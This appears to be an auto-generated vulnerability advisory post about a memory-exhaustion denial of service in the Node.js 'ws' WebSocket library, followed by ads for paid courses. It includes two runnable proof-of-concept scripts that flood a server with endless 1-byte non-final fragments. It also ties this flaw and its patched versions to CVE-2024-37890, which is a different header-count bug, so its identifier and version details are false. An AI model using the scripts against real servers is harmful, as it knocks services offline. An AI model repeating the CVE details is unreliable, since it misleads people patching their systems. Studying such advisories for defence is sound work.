Listen to this Post
Intro
CVE-2024-37890 is a memory exhaustion vulnerability in the `ws` WebSocket library for Node.js. The flaw resides in how the library handles fragmented WebSocket messages. Under the WebSocket protocol (RFC 6455), a message can be split into multiple fragments, each delivered in a separate frame. The `ws` library reassembles these fragments into a complete message before processing. However, prior to the patched versions, the library did not impose a limit on the number of fragments or control frames that could be queued while waiting for the final fragment.
An attacker can exploit this by sending a continuous stream of tiny fragments – each as a separate WebSocket frame with the `FIN` bit set to `false` – without ever sending the final fragment. For each fragment received, the library allocates a structure to hold the fragment’s data and bookkeeping information. Even though the total payload size per fragment can be as small as 1 byte, the per‑fragment overhead (including wrappers, buffers, and internal state) can be several hundred bytes. By sending a high volume of such fragments (e.g., tens of thousands per second) with modest network bandwidth, the attacker forces the remote peer to allocate an ever‑growing set of these wrappers.
Because the library does not release these allocations until the final fragment arrives (which never does), memory consumption grows linearly with the number of fragments. The default `maxPayload` option (which limits the total reassembled message size) is ineffective here, as it only checks the accumulated payload length, not the number of fragments or the wrapper overhead. Eventually, the Node.js process exhausts available memory and terminates with an “out of memory” (OOM) error. This is a denial‑of‑service (DoS) vulnerability that requires only a single WebSocket connection and modest traffic to trigger, making it highly dangerous for production servers.
The issue affects all `ws` versions prior to 8.21.0, 7.5.11, 6.2.4, and 5.2.5. The fix introduces a limit on the number of fragments that can be queued, thereby capping the memory overhead.
DailyCVE Form
Platform: Node.js
Version: <8.21.0,<7.5.11,<6.2.4,<5.2.5
Vulnerability: Memory exhaustion (DoS)
Severity: High
date: 2024-07-30
Prediction: 2024-08-15
What Undercode Say
Check vulnerable version npm list ws Install patched version npm install [email protected] Test for vulnerability (requires Node.js) node -e "const { WebSocket, WebSocketServer } = require('ws'); const wss = new WebSocketServer({ port: 0 }, () => { const data = Buffer.alloc(1); const options = { fin: false }; const { port } = wss.address(); const ws = new WebSocket(<code>ws://localhost:${port}</code>); ws.on('open', function send() { ws.send(data, options, (err) => { if (err) return; send(); }); }); ws.on('error', console.error); }); wss.on('connection', (ws) => ws.on('error', console.error));"
Exploit
// Proof of concept – sends infinite 1‑byte fragments
const { WebSocket, WebSocketServer } = require('ws');
const wss = new WebSocketServer({ port: 8080 });
wss.on('connection', (ws) => {
console.log('Client connected – vulnerable');
});
const ws = new WebSocket('ws://localhost:8080');
ws.on('open', () => {
const fragment = Buffer.alloc(1);
const options = { fin: false }; // fragment, not final frame
function sendFragment() {
ws.send(fragment, options, (err) => {
if (err) return;
setImmediate(sendFragment);
});
}
sendFragment();
});
ws.on('error', console.error);
Protection
- Upgrade to
[email protected],7.5.11,6.2.4, or `5.2.5` immediately. - If upgrade is impossible, reduce the `maxPayload` option to a low value (e.g.,
maxPayload: 1024). This does not eliminate the flaw but lowers the maximum memory per fragmented message. - Use reverse proxies or load balancers that enforce per‑connection memory and fragment limits.
- Monitor memory usage and restart processes periodically as a temporary workaround.
Impact
Successful exploitation causes the Node.js process to consume all available memory (RAM + swap) and crash, leading to denial of service. A single unauthenticated WebSocket connection is sufficient. Attackers require only modest bandwidth (e.g., a few kilobytes per second) to send thousands of fragments. This can take down critical services like real‑time APIs, chat servers, gaming backends, and any application using the `ws` library for WebSocket communication. No data leakage or privilege escalation is involved – purely availability impact.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
